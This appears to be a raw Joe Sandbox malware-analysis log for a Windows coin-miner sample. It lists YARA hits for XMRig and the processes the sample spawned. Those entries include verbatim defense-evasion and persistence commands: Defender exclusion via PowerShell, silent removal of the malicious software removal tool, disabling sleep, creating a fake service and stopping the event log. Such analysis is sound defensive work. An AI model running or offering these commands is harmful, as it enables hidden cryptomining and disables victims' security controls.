          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E8589944A821_2_000001E8589944A8
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E85898DCE021_2_000001E85898DCE0
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E8589B1F2C21_2_000001E8589B1F2C
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E8589C38A821_2_000001E8589C38A8
          Source: C:\Windows\System32\winlogon.exeCode function: 21_2_000001E8589BD0E021_2_000001E8589BD0E0
          Source: C:\ProgramData\IGaming\driver.exeCode function: 26_2_00007FF7F4F23B6026_2_00007FF7F4F23B60
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140ADFC1F2C27_2_00000140ADFC1F2C
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140ADFCD0E027_2_00000140ADFCD0E0
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140ADFD38A827_2_00000140ADFD38A8
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140AE86DCE027_2_00000140AE86DCE0
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140AE8744A827_2_00000140AE8744A8
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000140AE862B2C27_2_00000140AE862B2C
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000195DD59D0E030_2_00000195DD59D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000195DD5A38A830_2_00000195DD5A38A8
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000195DD591F2C30_2_00000195DD591F2C
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000195DD5CDCE030_2_00000195DD5CDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000195DD5D44A830_2_00000195DD5D44A8
          Source: C:\Windows\System32\svchost.exeCode function: 30_2_00000195DD5C2B2C30_2_00000195DD5C2B2C
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160C9E1F2C31_2_000001160C9E1F2C
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160C9ED0E031_2_000001160C9ED0E0
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160C9F38A831_2_000001160C9F38A8
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160CA12B2C31_2_000001160CA12B2C
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160CA1DCE031_2_000001160CA1DCE0
          Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001160CA244A831_2_000001160CA244A8
          Source: C:\Windows\System32\dialer.exeCode function: 42_2_000000014000226C42_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 42_2_00000001400014D842_2_00000001400014D8
          Source: C:\Windows\System32\dialer.exeCode function: 42_2_000000014000256042_2_0000000140002560
          Source: C:\Windows\System32\dialer.exeCode function: 44_2_000000014000316044_2_0000000140003160
          Source: C:\Windows\System32\dialer.exeCode function: 44_2_00000001400026E044_2_00000001400026E0
          Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000257E10838A846_2_00000257E10838A8
          Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000257E107D0E046_2_00000257E107D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000257E1071F2C46_2_00000257E1071F2C
          Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000257E10B44A846_2_00000257E10B44A8
          Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000257E10ADCE046_2_00000257E10ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000257E10A2B2C46_2_00000257E10A2B2C
          Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001F28C1E38A847_2_000001F28C1E38A8
          Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001F28C1DD0E047_2_000001F28C1DD0E0
          Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001F28C1D1F2C47_2_000001F28C1D1F2C
          Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001F28C9444A847_2_000001F28C9444A8
          Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001F28C93DCE047_2_000001F28C93DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001F28C932B2C47_2_000001F28C932B2C
          Source: C:\Windows\System32\svchost.exeCode function: 48_2_000001CA97FD1F2C48_2_000001CA97FD1F2C
          Source: C:\Windows\System32\svchost.exeCode function: 48_2_000001CA97FDD0E048_2_000001CA97FDD0E0
          Source: C:\Windows\System32\svchost.exeCode function: 48_2_000001CA97FE38A848_2_000001CA97FE38A8
          Source: C:\Windows\System32\svchost.exeCode function: 48_2_000001CA98542B2C48_2_000001CA98542B2C
          Source: C:\Windows\System32\svchost.exeCode function: 48_2_000001CA9854DCE048_2_000001CA9854DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 48_2_000001CA985544A848_2_000001CA985544A8
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D2652F38A849_2_000001D2652F38A8
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D2652ED0E049_2_000001D2652ED0E0
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D2652E1F2C49_2_000001D2652E1F2C
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D2653244A849_2_000001D2653244A8
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D26531DCE049_2_000001D26531DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D26532AEC249_2_000001D26532AEC2
          Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001D265312B2C49_2_000001D265312B2C
          Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000254A27D2B2C50_2_00000254A27D2B2C
          Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000254A27E44A850_2_00000254A27E44A8
          Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000254A27DDCE050_2_00000254A27DDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000024B87DDDCE051_2_0000024B87DDDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000024B87DE44A851_2_0000024B87DE44A8
          Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000024B87DD2B2C51_2_0000024B87DD2B2C
          Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000205FB3CD0E052_2_00000205FB3CD0E0
          Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000205FB3D38A852_2_00000205FB3D38A8
          Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000205FB3C1F2C52_2_00000205FB3C1F2C
          Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000205FD402B2C52_2_00000205FD402B2C
          Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000205FD4144A852_2_00000205FD4144A8
          Source: C:\Windows\System32\svchost.exeCode function: 52_2_00000205FD40DCE052_2_00000205FD40DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001A2056A2B2C53_2_000001A2056A2B2C
          Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001A2056ADCE053_2_000001A2056ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001A2056B44A853_2_000001A2056B44A8
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F3D0E054_2_0000018EC1F3D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F438A854_2_0000018EC1F438A8
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F31F2C54_2_0000018EC1F31F2C
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F6DCE054_2_0000018EC1F6DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F744A854_2_0000018EC1F744A8
          Source: C:\Windows\System32\svchost.exeCode function: 54_2_0000018EC1F62B2C54_2_0000018EC1F62B2C
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3BCD0E055_2_0000025CE3BCD0E0
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3BD38A855_2_0000025CE3BD38A8
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3BC1F2C55_2_0000025CE3BC1F2C
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3E0DCE055_2_0000025CE3E0DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3E144A855_2_0000025CE3E144A8
          Source: C:\Windows\System32\svchost.exeCode function: 55_2_0000025CE3E02B2C55_2_0000025CE3E02B2C
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_0000026238951F2C56_2_0000026238951F2C
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_00000262389638A856_2_00000262389638A8
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_000002623895D0E056_2_000002623895D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_0000026238982B2C56_2_0000026238982B2C
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_00000262389944A856_2_00000262389944A8
          Source: C:\Windows\System32\svchost.exeCode function: 56_2_000002623898DCE056_2_000002623898DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E561F2C57_2_000002786E561F2C
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E56D0E057_2_000002786E56D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E5738A857_2_000002786E5738A8
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E592B2C57_2_000002786E592B2C
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E59DCE057_2_000002786E59DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002786E5A44A857_2_000002786E5A44A8
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FF7D0E058_2_000001611FF7D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FF838A858_2_000001611FF838A8
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FF71F2C58_2_000001611FF71F2C
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FFADCE058_2_000001611FFADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FFB44A858_2_000001611FFB44A8
          Source: C:\Windows\System32\svchost.exeCode function: 58_2_000001611FFA2B2C58_2_000001611FFA2B2C
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F3638A859_2_0000027C0F3638A8
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F35D0E059_2_0000027C0F35D0E0
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F351F2C59_2_0000027C0F351F2C
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F3944A859_2_0000027C0F3944A8
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F38DCE059_2_0000027C0F38DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 59_2_0000027C0F382B2C59_2_0000027C0F382B2C
          Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\ftnvuqwjtdwb.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF749F41394 appears 33 times
          Source: C:\ProgramData\IGaming\driver.exeCode function: String function: 00007FF7F4F21394 appears 33 times
          Source: 45.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 45.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 45.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 0000002D.00000002.3359712073.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: Process Memory Space: dialer.exe PID: 528, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: System.evtx.52.drBinary string: C:\Device\HarddiskVolume3~(
          Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.52.drBinary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
          Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.52.drBinary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
          Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.52.drBinary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
          Source: System.evtx.52.drBinary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
          Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.52.drBinary string: L\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
          Source: System.evtx.52.drBinary string: C:\Device\HarddiskVolume3
          Source: System.evtx.52.drBinary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4eb
          Source: System.evtx.52.drBinary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
          Source: System.evtx.52.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exep
          Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.52.drBinary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
          Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.52.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
          Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.52.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
          Source: Security.evtx.52.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.syst
          Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.52.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
          Source: ftnvuqwjtdwb.sys.26.drBinary string: \Device\WinRing0_1_2_0
          Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.52.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
          Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.52.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
          Source: Security.evtx.52.drBinary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sysF
          Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@62/72@2/2
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,14_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 42_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,42_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,14_2_00000001400019C4
          Source: C:\Windows\System32\dialer.exeCode function: 14_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,14_2_000000014000226C
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4668:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5284:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6576:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5560:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5948:120:WilError_03
          Source: C:\Windows\System32\dialer.exeMutant created: \BaseNamedObjects\Global\ldndhoaiflkhpadl
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3168:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3176:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2072:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5040:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3712:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4956:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5312:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4ur20yo.jej.ps1Jump to behavior
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: file.exeVirustotal: Detection: 80%
          Source: file.exeReversingLabs: Detection: 81%
          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "LightService"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "LightService" binpath= "C:\ProgramData\IGaming\driver.exe" start= "auto"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "LightService"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\ProgramData\IGaming\driver.exe C:\ProgramData\IGaming\driver.exe
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\IGaming\driver.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "LightService"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "LightService" binpath= "C:\ProgramData\IGaming\driver.exe" start= "auto"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "LightService"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
